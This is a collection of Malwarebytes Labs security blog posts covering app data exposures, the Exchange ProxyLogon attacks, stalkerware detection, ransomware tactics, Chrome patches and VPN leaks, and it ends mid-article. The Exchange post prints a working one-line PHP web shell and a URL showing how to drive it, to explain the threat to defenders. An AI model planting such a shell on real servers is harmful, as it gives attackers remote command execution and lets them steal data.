IT NEWS

Video and audio are huge privacy concerns for people. If something goes wrong with tech it can have major ramifications. You’re likely very familiar with warnings about video. However, audio hasn’t always been so prominent. It’s only really since the rise of home assistants like Amazon’s Alexa that audio worries have gone mainstream.

Turning up the volume on audio threats

Bluetooth earphones and similar devices have only helped to raise awareness of potential issues, as we consider the tools we use the most. As per the link, it’s generally a lot harder to secure sound than vision. There isn’t an audio equivalent of the bit of tape over your webcam. You’re dealing with the innards of your device and that’s not for everyone. Either the hardware tinkering is beyond them, or their audio setup is a confusing mess of six audio devices and brand-specific audio controls.

It isn’t easy, and that’s just for desktop. Mobile is another proposition altogether, being an incredibly personal device yet something of a mystery-box to many owners. How does your Android phone work? Which version of Android is it even? How do the basic settings differ on your phone from mine? You’re giving me an iPhone for work? Sorry, I’ve never used one of those before.

These are just a sample selection of the things you’ll run into if you’ve ever been nominated your household’s Christmas season tech support. Worse, a lot of what seems to happen on a phone actually happens in the cloud (such as interpreting voice commands), where it’s completely beyond your reach.

Which brings us neatly to a recent discovery.

Listening in to someone else’s recordings

Researchers found an issue with an iPhone call recording app, which boasts of “more than 1,000,000 downloads”. Used to record and share clips via email, or saved to storage solutions such as Dropbox and Google Drive, it offers a fair bit of flexibility for people in need of some audio recording.

The researcher who discovered the vulnerability used various security testing tools to view and modify network traffic used by the app. From there, they discovered it was possible to replace their own phone number with someone else’s. With that done, recordings from that phone (located in the cloud, on an Amazon AWS bucket) were available to them, without a password. The entire call history and the numbers calls were made on were also available, at least until the app was updated and the problem fixed by the developers.

Or, as the researchers at PingSafe put it:

The vulnerability allowed any malicious actor to listen to any user’s call recording from the cloud storage bucket of the application and an unauthenticated API endpoint which leaked the cloud storage URL of the victim’s data

Considering the kind of recordings people could make, this is a worrying thing to have happened. Think of all the business sensitive conversations people might have, or personal discussions, random thoughts, or anything else. Yes, we can argue people shouldn’t upload mission critical work conversations into the cloud (or even a laundry list of complaints about their neighbour). However, if you give people a recording app then record they will.

The perils of audio data in the cloud

TechCrunch reports there were 130,000+ audio recordings, weighing in at some 300GB in size, in the storage bucket. That’s a lot of potential for mischief, pranks, trolling, or just plain old blackmail and extortion. If we’re lucky, the only person who noticed this was the researcher who reported it.

Audio has always been a source for security and privacy concerns. Whether we’re talking fake Twitch audio fixes or where people’s data ends up, it’s always worth keeping in mind.

It might not be as visible a concern as the usual security hot-spots on your laptops and mobile devices, or as obvious as video. All the same, it’s an important part of your overall security hygiene.

This is probably an excellent moment to check:

• if your audio software need updating
• your streaming accounts are secure
• you’re happy with any audio files kept in the cloud

Follow these steps and hopefully your audio security will soon catch up with your visual-based best practices.

The post iPhone app exposed other people’s call recordings appeared first on Malwarebytes Labs.

Only last week we posted a blog about multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server in limited and targeted attacks. Seeing how this disclosure came with a patch being available, under normal circumstances you would see some companies update quickly and others would dally until it bubbled up to the top of their to-do list.

This attack method, called ProxyLogon and attributed to a group called Hafnium, was different. It went from “limited and targeted attacks” to a full-size panic in no time. Attackers are using the Exchange bugs to access vulnerable servers before establishing web shells to gain persistence and steal information.

How did this situation evolve? A timeline

To demonstrate how this situation came about we want to show you this timeline of developments:

• December 2020, CVE-2021-26855 is discovered by DEVCORE, who named the vulnerability ProxyLogon.
• January 2021, DEVCORE send an advisory and exploit to Microsoft through the MSRC portal.
• January 2021, Volexity and Dubex start to see exploitation of Exchange vulnerabilities.
• January 27, 2021, Dubex shares its findings with Microsoft.
• February 2, 2021, Volexity informs Microsoft of its findings.
• March 2, 2021, Microsoft publishes a patch and advisory, which has been updated a few times since then.
• March 4, 2021, The Cybersecurity and Infrastructure Security Agency issues an emergency directive after CISA partners observe active exploitation of vulnerabilities in Microsoft Exchange on-premises products.
• March 5, 2021, Microsoft and many security vendors see increased use of these vulnerabilities in attacks targeting unpatched systems, by multiple malicious actors, not just Hafnium.
• March 8, 2021, CISA issues a warning that it is aware of widespread domestic and international exploitation of these vulnerabilities.

The attacks went from a limited Advanced Persistent Threat (APT) used against targeted victims to cryptomining operations run by “common” cybercriminals in no time flat.

What often happens after vulnerabilities get disclosed and patched is that criminals reverse engineer the fix to create their own copycat exploits, so they can attack while systems are unpatched. Sometimes it takes a lot of skills and perseverance to get a vulnerability to work for you, but looking at the rapid introduction of these Exchange exploits into the threat landscape, this one looks like a piece of cake.

Victims

As of 8 March, Malwarebytes had detected malicious web shells on close to 1,000 unique machines already. Although most of the recorded attacks have occurred in the United States, organizations in other countries are under attack as well.

Chris Krebs, the former director of CISA, reckons government agencies and small businesses will be more affected by these attacks than large enterprises. Enterprises tend to use different software than on-premises Exchange Servers.

But Brian Krebs, in a post on his site, states that the Hafnium hackers have accelerated attacks on vulnerable Exchange servers since Microsoft released the patches. His sources told him that 30,000 organizations in the US have been hacked as part of this campaign.

Web shells

A web shell is as a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)

Web shells don’t attack or exploit a remote vulnerability, they are always the second step of an attack. Even if it opens the door to further exploitation, a web shell itself is always dropped after an initial exploitation.

Web shell scripts can be written in any of the programming languages designed for use on the web. You will find PHP, ASP, Perl, and many others. Attackers who successfully use web shells take advantage of the fact that many organizations do not have complete visibility into the HTTP sessions on their servers. And most web shells are basically non-executable files, which can make it hard for traditional antivirus software to detect them. The tiniest web shell in PHP on record is only this big:

<?=`$_GET[1]`?>

A shell like this will simply execute whatever command an attacker sends to the compromised server. They run it by calling the script in their browser, or from a command line HTTP client. For example, the following url would cause a tiny web shell running on example.com to execute whatever we put replaced {command} with:

www.example.com/index.html?1={command}

As you can see the use of this type of backdoor is easy. Once you have planted the web shell, you can use it to create additional web shells or steal information from the server.

What can we do?

Patch as soon as you can.

Microsoft’s team has published a script on GitHub that can check the security status of Exchange servers. The script has been updated to include indicators of compromise (IOCs) linked to the four zero-day vulnerabilities found in Microsoft Exchange Server.

It was important to patch last week, when it was just targeted attacks, but it’s all the more urgent now that it’s wild west out there. If you can’t patch your Exchange server, block internet access to it, or restrict access to it by blocking untrusted connections, or putting the server behind your VPN.

Scan your server for the presence of malicious web shells. Security vendors have added detection for the publicly posted IOCs and some will detect other malicious web shells as well.

Malwarebytes’ generic detection name for malicious web shells is Backdoor.WebShell and the detection name for the web shells that are tied directly to the Hafnium group is Backdoor.Hafnium.

Stay safe, everyone!

The post Microsoft Exchange attacks cause panic as criminals go shell collecting appeared first on Malwarebytes Labs.

In 2019, when Malwarebytes helped found the Coalition Against Stalkerware, which brings together cybersecurity vendors and nonprofits to detect and raise awareness about stalkerware, we encountered a significant roadblock in our fight: For some users, the very detection of these potentially privacy-invasive tools could put their lives at greater risk.

In short, we needed a way to detect stalkerware-type apps without the detection being discoverable by stalkerware-type apps or their users.

Now, a new tool makes that far more possible.

Developed by a small team at Kaspersky, “TinyCheck” represents the latest technological effort from a Coalition Against Stalkerware member to continue the fight against a digital threat that can rob people of their expectation of, and right to, privacy. It is just one of the many advancements from the Coalition Against Stalkerware, which meets routinely to discuss ongoing research, new member applications, regional outreach, and advances in detections.

What is TinyCheck?

TinyCheck is an open-source tool available on GitHub that requires a higher technical skillset than downloading and running any of the apps made by the Coalition Against Stalkerware’s cybersecurity vendors. Those apps, like Malwarebytes for Android, are installed directly on a device where they can perform malware scans to detect and remove suspicious or dangerous programs.

TinyCheck, on the other hand, runs separate from a smartphone, on a computer like a Raspberry Pi. Functionally, TinyCheck is configured to act as a WiFi access point. Once set up and connected to a smartphone, TinyCheck will analyze that smartphone’s Internet traffic and determine if it is sending data to a known, malicious server.

Kristina Shingareva, head of external relations for Kaspersky, said that TinyCheck “was built with the idea of making it impossible to identify its use via a stalkerware app.”

“The analysis of the checked device is only available to the individual person using TinyCheck with their own equipment,” Shingareva said. “It is not shared anywhere: neither Kaspersky nor any other party will receive this data.”

Further, Shingareva said that TinyCheck analyses are performed locally, and the data from those analyses, including full packet capture, logs, and a PDF report, can only end up on a USB stick that users can plug in to save records, or on a computer, if TinyCheck is running in a browser from a remote workstation.

This may sound like a lot of technical fuss for the everyday user, but the value is tremendous. When used correctly, TinyCheck can overcome what we are calling the “stalkerware detection dilemma.”

The stalkerware detection dilemma

For years, the detection of stalkerware-type apps followed the same model: If a user thought they had a malicious app on their phone, they downloaded a separate, anti-malware app to find that malicious app and then potentially root it out.

This makes sense, as early stalkerware detection fell somewhat haphazardly to the individual cybersecurity vendors that were already protecting people’s computers from other cyberthreats, such as malware, ransomware, and Trojans.

But as effective as that cyberthreat detection model is, it makes a lot of assumptions about its users. First, it assumes that users have full agency of their computers and devices, able to download a separate program on their own, and then run that program with little interference. Second, it assumes that the removal of a cyberthreat is the best way to keep a user safe.

In reality, those assumptions could be dangerous when dealing with stalkerware.

As we have written about on Malwarebytes Labs, there is a documented intersection between stalkerware use and domestic abuse. Domestic abusers have repeatedly used these tools to invade the privacy of their partners’ lives, prying into their text messages and emails, revealing their web browsing history, pinpointing their GPS location, and secretly recording their phone calls.

For many domestic abusers, stalkerware can serve as a digital method to maintain control of their partner’s life. For the survivor, then, the removal of a stalkerware-type app can actually cause more harm, cutting off their abuser’s control and only enraging them. Further, many domestic abuse survivors simply do not have sufficient device control to download and run an anti-malware application on their phone. Their phones may be shared with their abusers, or their phone’s passcode may be required to be shared, or their abuser may not even allow them to have a passcode on their phone at all.

Finally, some stalkerware-type apps can also see a device’s most recently installed app, the device’s screen when active, and the notifications delivered to the device, which could in turn reveal that a survivor downloaded an anti-malware scanner, used the scanner, and then received a notification about a stalkerware-type app present on the device.

Here, then, is the stalkerware detection dilemma: How can we safely detect these threats when the detections themselves could lead to more harm?

It is a question that many members of the Coalition Against Stalkerware have asked, and shortly after the Coalition welcomed Centre Hubertine Auclert as an associate partner, the French organization began working with Kaspersky to find a solution. Inspired by the opportunity, Kaspersky researcher Félix Aimé charged ahead, eventually releasing the first version of TinyCheck last year.

It has since gained new features and seen promising adoption.

Big impact

Though TinyCheck has a higher technical bar for use, it can help address an important gap.

According to Shingareva, Kaspersky relied on several of its experts to run a workshop in January that invited individuals from 15 French associations working to prevent and protect people from domestic abuse. Shingareva said that the company is also supporting TinyCheck in Australia, where it will launch a pilot phase of testing with the network committed to women’s domestic and family violence services, WESNET.

So far, TinyCheck has also been “starred” by more than 1,700 users on GitHub, and the introductory video to TinyCheck on YouTube has obtained more than 4,600 views.

Recently, Kaspersky’s developers updated TinyCheck to be able to send notifications to users when new updates are available. The company is also adding new languages to the user interface, with current functionality available in English, French, Spanish, and Catalan.

Shingareva said it is important that advocate networks and non-governmental organizations committed to protecting survivors of domestic abuse are heavily involved in the further development of TinyCheck. With yet another tool to help fight against stalkerware threats, we are hopeful for the future.

The post TinyCheck: Stalkerware detection that doesn’t leave a trace appeared first on Malwarebytes Labs.

The REvil ransomware (AKA Sodinokibi, which operates as a Ransomware as a Service) is adopting some outreach techniques after initial compromise, designed to shame victims into paying up.

Shaming victims into action

Malware authors and social engineers have relied on shame and the threat of exposure for years. Nothing encourages potential victims to pay up like a solid threat. This isn’t something to underestimate or dismiss. It can have very serious consequences, with at least one tragedy involving a suicide linked to common-or-garden ransomware threats. 

These threats are most closely linked to people at home, with sextortion being one of the biggest.

This is where victims are told someone has footage of them watching pornographic material, or engaging in sexual activity. If they don’t pay the Bitcoin ransom, scammers will release the footage to the world at large or even to just friends and family. This threat comes from old passwords taken from password dumps—which have probably long since changed—which could lend some believed credibility to the threat. The Ransomware authors have no footage whatsoever, but it’s a very effective tactic.

From consumer to corporate…

In recent developments, ransomware bought itself a business suit and a nice tie, and it started working its way into corporate. Here, the gimmick was compromising the network, locking up important files and/or servers and demanding cash to release them back to victims.

This quickly became a mess of arguments over paying the ransom, and the world of cyber insurance and whether it would actually insure against these types of attacks. It also led into the concept of ransomware authors ruining their own trust model with broken unlocks or missing decryption keys.

This time it’s personal

Whereas typical ransomware attacks involve encryption of all available files. More recently, attackers have added data exfiltration to their box of tricks, along with threats to leak the stolen data if victims are able to recover from the encryption with the attacker’s help.

A well-worn security notion is that we never know the full story in terms of numbers compromised by attack X or Y. This seems a reasonable assumption; lots of consumer and business victims of cybercrime do not want to publicize it. There may be liability issues they’re trying to keep hidden, or perhaps they don’t want the embarrassment of everyone knowing what happened.

This latest development twists the exfiltration knife a bit harder by using a splash of shame to encourage victims to pay up.

The scammers perform outreach to the media and the victim’s clients. The idea here is to keep heaping pressure on the victims until they relent and pay up. VoIP calls seem to be the method of choice for said outreach, which helps keep callers anonymized.

As noted by Bleeping Computer, similar tactics have been used in the past, but those calls focused on the victims. Threatening to expose a compromised machine or network via journalists or business affiliates is upping the stakes quite a bit.

As with ransomware attacks where there is no guarantee of being given a decryption key after payment, so too is there no guarantee the attackers will play nice afterwards. Regardless of tactics used, the end results are always the same: pay up, or else.

Putting scammers on the do-not-call list

Options may be limited depending on how prepared victims are at the start of a ransomware attack. It may well be that files are unrecoverable, or business operations cease while cleanup takes place.

It could be a huge payout is handed to the attackers, and no files are returned. They may get lucky, with all services restored and no mention outside the four walls of the business affected. It’s simply a lottery, though having said that, there’s a few ways you can even the odds. Stay safe out there, and hopefully you’ll never have to hear a ransomware fan at the other end of a telephone line.

The post REvil ransomware’s calling, and it’s not good news appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs, our podcast featured Eva Galperin who talked to us about defending online anonymity and speech.

We wrote about how Ryuk ransomware has developed a worm-like capability, how Exchange servers are attacked by Hafnium zero-days, 21 million free VPN users’ data was exposed, how China’s RedEcho was accused of targeting India’s power grids, whether Google’s Privacy Sandbox will take the bite out of tracking cookies, and how a Chrome fix patches an in-the-wild zero-day.

Other cybersecurity news

• Gab has been badly hacked, the stolen information includes what appears to be passwords and private communications. (Source: Wired)
• A bug in a shared SDK can let attackers join calls undetected across multiple apps. (Source: ZDNet)
• Business email compromise (BEC) scammers are utilizing a new type of attack targeting investors. (Source: BleepingComputer)
• Socially engineered attacks surfaced in maritime cybersecurity. (Source: Center for International Maritime Security)
• Researchers found three new malware strains used by the SolarWinds group. (Source: The Hacker News)
• Horticulture is an interesting sector for hackers since it is at the forefront of modern technologies. (Source: Horti Daily)
• A federal judge has approved a $650m settlement of a privacy lawsuit against Facebook for allegedly using photo face-tagging and other biometric data without the permission of its users. (Source: The Guardian)
• Google shared a PoC exploit for a critical Windows 10 Graphics RCE bug. (Source: Bleeping Computer)

Stay safe, everyone!

The post A week in security (March 1 – 7) appeared first on Malwarebytes Labs.

Happy Monday! And if you haven’t yet checked the significance of this day—March 8—before grabbing coffee, today is International Women’s Day (IWD).

Since March 19, 1911, the year the very first IWD was observed in several European countries, millions of people have been calling for women to be given more rights, which includes the right to work, vote, and hold public office. A few years later it was moved to March 8 and it has been celebrated on that day ever since.

The United Nations first celebrated IWD in 1975, and two years later proclaimed a United Nations Day for Women’s Rights and International Peace to be observed by member states.

Today, people around the world are celebrating the cultural, economic, political, and social achievements of women. And strong female influences help create equally strong women. Here at Malwarebytes, we didn’t have to look very far for examples. With piqued curiosity, we asked a selection of women who their heroes are. Here are their answers.

RBG

My hero is Ruth Bader Ginsburg. Her entire journey is so inspiring, she led the way for so many women as a role model. She spoke up when it wasn’t entirely ok for woman to speak up, she created a path for woman to become professionals in the corporate world, and became the second female on the Supreme Court.

Ruth fought for what was right, gender equality, women’s rights and was a big proponent of making sure that every woman has their voice heard. She pushed through many challenges, overcame so many obstacles and was the voice that was needed to help push gender equality forward. It isn’t often that someone is so brave and stands up for what is right in the face of so much adversity.

— Jamie Hudson, Vice President, Global Support & Services

Amanda Palmer

I’d like to talk about my female hero, the artist Amanda Palmer. Whereas I would’ve liked her in my 20s for her daring style and cool music, I admire her now for using her platform to further empower women, to really understand and celebrate their worth. Her book and Ted Talk “The Art of Asking” taught me about the importance of community and kindness, and how we should overcome this fear of asking each other for help, as we are stronger together.

I had the pleasure of meeting her last year, and was blown away by her kindness and love. The meeting left me with a sense of empowerment and determination to keep paying it forward, to keep lifting other women (and with that, myself) up.

— Tjitske dV, Community Relations Manager

Charlotte Klein (and others)

A few of my famous heroes are Tina Fey, Amy Poehler, and Joan Didion. They’ve each blazed pioneering trails in comedy, writing, and journalism, advancing the embrace of female leadership in these previously male-dominated industries. They’ve created iconic characters and captivating stories that have made a tremendous impact on society. Their wit, bravery, and pure talent are an inspiration.

And a real-life hero is the dearly-departed, legendary Charlotte Klein. She was the director of the nationally renowned Charlotte Klein Dance Centers where I studied for 10 years. She was tough as nails (hers were always perfectly manicured), expecting excellence from her students, but offering unrelenting support in return. She gave me the backbone, skills, self-confidence, and heart I needed to succeed in my goals—and they were (are) lofty ones!

— Wendy Zamora, former editor-in-chief, Malwarebytes Labs; current tech/security writer

The post International Women’s Day: Women in tech name their heroes appeared first on Malwarebytes Labs.

Third-party cookies have been the lynchpin of online advertising for many years. Plans to phase cookies out forever continue to run at a steady pace, with Google in the driving seat. In 2019, it announced its vision for a “Privacy Sandbox”. The building blocks for this were essentially:

1. Most aspects of the web need money to survive, and advertising that relies on cookies is the dominant revenue stream.
2. Blocking ads or cookies can prevent advertisers from generating revenue, threatening #1.
3. If you block easily controllable methods like cookies, advertisers may turn to other techniques, like fingerprinting, that are harder for users to control.

The Privacy Sandbox mission is to “Create a thriving web ecosystem that is respectful of users and private by default”. The intention is to create a set of rules that will work well for everybody. No third-party cookies, no incredibly specific individual marketing profiles, and data is kept on your device as much as possible. User data is anonymised and grouped into “cohorts”, and those cohorts with similar interests will then see targeted ads. In this way, users aren’t compromising privacy and advertisers can still deliver targeted ads, but will struggle to map out individual identities.

Broadening the scope of user privacy

This all sounds reasonable enough. A push for standards where user data sharing is greatly reduced, but ads can still function as intended is likely much better than what we have now. The wheels often come off on long-term plans like this, so it is to their credit it’s still very much happening.

You can see some aspects of web control already offered by Google in this blog from 2019:

• My Activity: Look at searches, websites visited, videos watched. It’s sort of like your browser history, but on a grand Google scale, with options to disable aspects of search or location.
• Ad Settings: Possibly the most relevant to this subject, as it shows how your ads are personalised. This is done via data you’ve added, Google’s best guesses, and data from advertisers partnered with Google. My standout highlight was the assumption I’m into extreme sports, flower arranging, and country music. I guess I’m obscuring my actual interests in a very privacy conscious fashion.

They also explain at length why you see specific ads, and also how to opt out.

Slow and steady wins the race?

Tackling third-party cookies isn’t a particularly new idea, and both Safari and Firefox have been bringing the hammer down, to various degrees of severity. But the companies behind those browsers don’t depend on ad revenue in the way that Google does. Which is why what Google is attempting is not a straightforward ban; it’s trying to find ways to replace the old system entirely. There are many, many arguments about this subject. Some advertisers claim organisations are doing this to keep users behind their own walled garden of advertising and tracking. Others say whatever you replace the old system with, will either be ignored or worked around.

This last point has some validity to it. While the major advertising players will probably work with the new methods, this leaves a gap in the market for shenanigans. Not everybody will play nice. Many smaller networks are entirely reliant on individual tracking. In some cases, they may not be able to adapt—or might not want to.

Tearing up the rulebook

CNAME cloaking, where analytics firms make third-party cookies look like first-party cookies to get around ad-blocking, has been in the news recently. We can expect a lot more of these tactics as the inevitable demise of third-party cookies draws closer.

Much is still unknown about the proposed replacements too. We don’t know exactly how people might extract themselves from specific cohorts should they feel the need to, for example. Or even if it will be possible. If I see targeted, extreme-sport-flower-arranging ads all over the place, what options are available to “fix” it?

These are good questions to ponder while Privacy Sandbox continues its 2 year plan to bring the curtain down on the ubiquitous third-party cookie. We look forward to seeing what comes next, and cast a cautious eye in the direction of ad networks everywhere.

The post Will Google’s Privacy Sandbox take the bite out of tracking cookies? appeared first on Malwarebytes Labs.

RedEcho, an advanced persistent threat (APT) group from China, has attempted to infiltrate the systems behind India’s power grids, according to a threat analysis report from Recorded Future [PDF].

It appears that what triggered this attempt to gain a foothold in India’s critical power generation and transmission infrastructure, was a tense standoff at Pangong Tso lake in May 2020. However, the report by Recorded Future, a cybersecurity company specializing in threat intelligence, claims that RedEcho were on the prowl way before this time.

Incidents at the border

China and India have been locked in a territorial dispute for decades, over an ill-defined, disputed border between Ladakh and Aksai Chin. This de-facto boundary called the Line of Actual Control (LAC) sits in the Himalayan region. Because of snowcaps, rivers, and lakes along the frontier, the LAC can shift, and soldiers from both sides often find themselves face to face with each other, increasing the risk of a confrontation.

The most recent conflict at the border transpired in June 2020, barely a full month after the May skirmish. This time, Chinese and Indian soldiers clashed in Galwan, with China accusing India of crossing onto the Chinese side. A total of 63 casualties—20 troops from India and 43 from China—were reported. Both countries insisted that no bullets were exchanged. Instead, they engaged using, literally, sticks and stones (“rocks and clubs”, according to the BBC).

Incidents in cyberspace

Although Recorded Future had observed a lot of intrusion activity towards Indian organizations in the digital space before the clash, it gained momentum after the Indian and Chinese troops faced off in May.

“In the lead-up to the May 2020 skirmishes, we observed a noticeable increase in the provisioning of PlugX malware C2 infrastructure, much of which was subsequently used in intrusion activity targeting Indian organizations,” the report said. “The PlugX activity included the targeting of multiple Indian government, public sector, and defense organizations from at least May 2020.”

RedEcho is the latest APT group to target India via its energy sector using ShadowPad, a modular backdoor that has been in use since 2017. The company also noted in its report that ShadowPad is shared among other state-backed threat actor groups who are affiliated with both the Chinese Ministry of State Security (MSS) and the People’s Liberation Army (PLA). Some of these groups include APT41 (aka Barium, among others), Icefog, KeyBoy (aka Pirate Panda), Tick, and Tonto Team.

RedEcho allegedly penetrated a total of 12 organizations, including four of India’s five Regional Load Despatch Centres (RLDCs) and two State Load Despatch Centres (SLDCs). These organizations are responsible for ensuring the optimum scheduling and dispatching of electricity based on supply and demand across regions in India. According to Recorded Future, “The targeting of Indian critical infrastructure offers limited economic espionage opportunities; however, we assess they pose significant concerns over potential pre-positioning of network access to support Chinese strategic objectives.”

This isn’t the first time India’s critical infrastructure has been in the crosshairs. In November 2020, APT41 had set their sights on India’s oil and gas sectors. Media reports suggested that the October 2020 power outage in Mumbai and neighboring areas, which crippled train transportation, closed the stock exchange, and hampered those working from home amidst the pandemic, was sabotage. Some called the outage a “warning shot” from China.

“Profoundly disturbed”

Subrahmanyam Jaishankar, India’s foreign minister, described the relationship between India and China as “profoundly disturbed”. RedEcho is just one threat actor group that has entered the scene, but we can expect that they won’t be the last. And things might only get worse because of rising geopolitical tensions, not just between China and India but also between other countries that are currently in dispute.

Remember the December 2016 power grid attack against Ukraine by Russian hackers?

And to accentuate the likely reality that more attacks against critical infrastructures will happen in the future, Dragos Inc, a cybersecurity firm specializing in industrial cybersecurity, released its “2020 Year in Review” report in late February 2021 determining that threats against industrial control systems (ICSs) and operational technology (OT) have increased threefold.

It’s worth mentioning that not all attacks on critical infrastructure are backed by nation states though. And while this is true, the outcome is still the endangerment of lives. Take, for example, the attempted poisoning of a Florida city’s drinking water last month, which was likely an act of vandalism, but could have had the impact of a terrorist attack.

The post China’s RedEcho accused of targeting India’s power grids appeared first on Malwarebytes Labs.

The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability (CVE-2021-21166) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is not the first time that Chrome’s audio component was targeted by an exploit.

No details available

Further details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.

An object lifecycle is used in object oriented programming to describe the time between an object’s creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.

For example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn’t go well, and memory is mismanaged, that could lead to a flaw – or vulnerability – in the program.

More vulnerabilities patched in the update

As per usual Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:

Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).

The CVE’s

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).

• CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process’ memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.
• CVE-2021-21160: Heap buffer overflow in WebAudio.
• CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their application.
• CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.
• CVE-2021-21164: Insufficient data validation in Chrome for iOS.

When more details about the vulnerabilities come to light it’s possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now.

How to update

The easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time.

My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is Relaunch the browser.

Stay safe, everyone!

The post Update now! Chrome fix patches in-the-wild zero-day appeared first on Malwarebytes Labs.

Detailed credentials for more than 21 million mobile VPN app users were swiped and advertised for sale online last week, offered by a cyber thief who allegedly stole user data collected by the VPN apps themselves. The data includes email addresses, randomly generated password strings, payment information, and device IDs belonging to users of three VPN apps—SuperVPN, GeckoVPN, and ChatVPN.

The attacks, which have not been confirmed by the VPN developers, represent the most recent privacy broadsides against the VPN industry. Two similar blunders have been revealed to the public since 2019, including one massive data leak that exposed several VPN apps’ empty promises to collect “no logs” of their users’ activity. In that data leak, not only did the VPN providers fail to live up to their words, but they also hoovered up additional data, including users’ email addresses, clear text passwords, IP addresses, home addresses, phone models, and device IDs.

For the average consumer, then, the privacy pitfalls begin to paint an all-too-familiar portrait: Users continue to feel alone when managing their online privacy, even when they rely on tools meant to enhance that privacy.

Cybersecurity researcher Troy Hunt, who wrote about the recent data leak on Twitter, called the entire issue “a mess, and a timely reminder why trust in a VPN provider is so crucial.”

He continued: “This level of logging isn’t what anyone expects when using a service designed to *improve* privacy, not to mention the fact they then leaked all the data.”

The data leak of SuperVPN, GeckoVPN, and ChatVPN

In late February, a user on a popular hacking forum claimed that they’d stolen account information and credentials belonging to the users of three, separate VPNs apps available on the Google Play store for Android: SuperVPN, GeckoVPN, and ChatVPN.

The three apps vary wildly in popularity. According to Google Play’s count, ChatVPN has earned more than 50,000 installs, GeckoVPN has earned more than 10 million installs, and SuperVPN weighs in as one of the most popular free VPN apps for Android today, with more than 100 million installs to its name.

Despite SuperVPN’s popularity, it is also one of the most harshly reviewed VPN apps for Android devices. Last April, a writer for Tom’s Guide found critical vulnerabilities in the app that so worried him that the review’s headline directed current users to: “Delete it now.” And just one month later, a reviewer at TechRadarPro said that SuperVPN had a “worthless privacy policy” that was cobbled together from other companies’ privacy policies and which directly contradicted itself.

Not more than one year later, that privacy policy has again been thrown into the spotlight with a data leak that calls into question just what types of information the app was actually collecting.

According to the thief who pilfered the information from SuperVPN, GeckoVPN, and ChatVPN, the data for sale includes email addresses, usernames, full names, country names, randomly generated password strings, payment-related data, and a user’s “Premium” status and the corresponding expiration date. Following the forum post, the tech outlet CyberNews also discovered that the stolen data included device serial numbers, phone type and manufacturer information, device IDs, and device IMSI numbers.

According to CyberNews, the data was taken from “publicly available databases that were left vulnerable by the VPN providers due to developers leaving default database credentials in use.”

Past VPN errors

The unfortunate truth about the recent VPN app data leak is that this type of data mishap is nothing new.

In 2019, the popular VPN provider NordVPN confirmed to TechCrunch that it suffered a breach the year before. According to TechCrunch:

“NordVPN told TechCrunch that one of its data centers was accessed in March 2018. ‘One of the data centers in Finland we are renting our servers from was accessed with no authorization,’ said NordVPN spokesperson Laura Tyrell.

The attacker gained access to the server—which had been active for about a month—by exploiting an insecure remote management system left by the data center provider; NordVPN said it was unaware that such a system existed.”

Separate from the NordVPN breach, last July, seven VPN providers were found to have left 1.2 terabytes of private user data exposed online, according to a report published by the cybersecurity researchers at vpnMentor. According to the report, the exposed data belonged to as many as 20 million users. The data included email addresses, clear text passwords, IP addresses, home addresses, phone models, device IDs, and Internet activity logs.

The seven VPN providers investigated by vpnMentor were:

• UFO VPN
• Fast VPN
• Free VPN
• Super VPN
• Flash VPN
• Secure VPN
• Rabbit VPN

The researchers at vpnMentor also explained that there was good reason to believe that the seven apps were all made by the same developer. When analyzing the apps, vpnMentor discovered that all of them shared a common Elasticsearch server, were hosted on the same assets, shared the same, single payment recipient—Dreamfii HK Limited—and that at least three of the VPNs shared similar branding and layouts on their websites.

Finally, the report also highlighted the fact that all seven of the apps claimed to keep “no logs” of user activity. Despite this, vpnMentor said that it “found multiple instances of internet activity logs on [the apps’] shared server.”

The report continued: “We viewed detailed activity logs from each VPN, exposing users’ personal information and browsing activities while using the VPNs and unencrypted plain text passwords.”

So, not only did these apps fail to live up to their own words, but they also collected extra user data that most users did not anticipate. After all, most consumers might rightfully assume that a promise to refrain from collecting some potentially sensitive data would extend to a promise to refrain from collecting other types of data.

But, according to vpnMentor, that wasn’t the case, which is a clear breach of user trust.

Let’s put it another way:

Imagine choosing a video baby monitor that promised to never upload your audio recordings to the cloud, only to find that it wasn’t just sending those recordings to an unsecured server, but it was also snapping photos of your baby and sending those pictures along, too. 

Which VPN to trust?

The trust that you place into your VPN provider is paramount.

